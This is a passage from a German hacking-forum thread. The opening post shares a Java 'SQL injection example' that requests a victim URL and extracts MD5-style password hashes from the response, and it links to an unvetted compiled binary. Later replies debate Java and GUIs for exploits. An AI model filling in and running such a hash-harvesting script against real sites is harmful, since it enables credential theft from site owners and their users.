Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 17
  1. #1
    Anfänger
    Registriert seit
    15.11.2008
    Beiträge
    22

    Standard Java einsetzen für Exploit Programmierung > Es klappt !

    Es hat jemand geschafft einen Exploit zu programmieren unter Java :KA

    Code:
    /*
    SQL Injection Example
    www.bifrostworld.org
    */
    
    import java.net.*;
    import java.io.*;
    import java.util.regex.*;
    import java.util.*;
    import java.io.InputStream;
    
    class SQL {
       public static void main(String[] args){
    
    
      //Host URl without http://
      String host="";
      //Injection goes here
      String inject = "";
      String victim = "http://" + host + inject;
    
       try{
         URL url = new URL(victim);
         URLConnection connect = url.openConnection();
         InputStream in = connect.getInputStream();
         Scanner s = new Scanner(in);
    
         while(s.hasNext()){
           Pattern pat = Pattern.compile("([a-f0-9]{32})");
           Matcher match = pat.matcher(s.next());
    
           if(match.find()){
             System.out.println(match.group());
           }else{
             System.out.println("No hash found");
           }
         }
       }catch(Exception e){
         System.out.println(e);
       }
       }
    }
    Fertig compilt :
    http://ul.to/w4aghk

    Screenshot :

  2. #2
    I'm in ur VM. Avatar von l0dsb
    Registriert seit
    23.07.2007
    Beiträge
    1.038

    Standard

    Und was ist daran nun so besonders? o0
    I can haz RCE?

  3. #3
    W32.SwineFlu Avatar von Sirect
    Registriert seit
    24.07.2008
    Beiträge
    1.916

    Standard

    Ja und? Java hat Sockets, warum soll man da keine Exploits schreiben können?

  4. #4
    Anfänger
    Registriert seit
    15.11.2008
    Beiträge
    22

    Standard

    Und warum gibt es sowas kaum?

  5. #5
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard

    Jop wäre doch besserer wenn es Exploits mit GUIs geäbe...

  6. #6
    Anfänger
    Registriert seit
    15.11.2008
    Beiträge
    22

    Standard

    Es geht aber darum, dass es in Java geschrieben wurde. Außerdem ist es lediglich ein Beispiel wie sowas aussehen kann. Glaube kaum, dass sich hier einer jemals wirklich mit Java auseinander gesetzt hat, sondern einfach nur irgendwas daher redet.

  7. #7
    Gesperrt
    Registriert seit
    23.03.2009
    Beiträge
    438

    Standard

    Ich Frage mich auch gerade was daran so besonders sein solle.

  8. #8
    Emo Pwny Avatar von J0hn.X3r
    Registriert seit
    03.06.2007
    Beiträge
    3.256

    Standard

    Zitat Zitat von hackerking Beitrag anzeigen
    Jop wäre doch besserer wenn es Exploits mit GUIs geäbe...
    Ich find ohne GUI siehts besser aus.

    Und was das besondere ist:

    Ich denk einfach, dass es wenig Java Exploits gibt, und es daher etwas besonderes ist.

    Boardregeln * Blackmarket * SuFu * Kontakt * PGP Key

    ..das Handy klingelt, sie fragen nach Kollegah
    dem morgens schon Giorgi-Armani-Sakkoträger
    heben Bares ab und zahlen, nehmen die Ware ab und gehen
    es ist der Strassenapotheker


  9. #9
    Kuschel-Wuschel enco Avatar von enco
    Registriert seit
    26.01.2006
    Beiträge
    1.075

    Standard

    Ein Exploit in Ook oder Brainfuck wäre cool, aber an java finde ich nichts besonderes ...

  10. #10
    Michelangelo Virus
    Registriert seit
    29.06.2008
    Beiträge
    273

    Standard

    JAVA != SOFORT GUI

    könnt auch exploits mit gui in vb,perl,php,und whatever coden, eben alles was bibliotheken für guis bereitstellt

    exploits sind im eigentlichen sinne, nur funktionsbeweiße zur ausnutzung einer Sicherheitslücke,.

    Und da nimmt man eben eher Schnelle und verbreitete Script Sprachen wie z.B Perl oder PHP.

    Wieso sollte jemand eine extra einen GUI für einen Proof of Concept bereitstellen.
    Geändert von int_main(); (02.05.2009 um 14:39 Uhr)

Seite 1 von 2 12 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •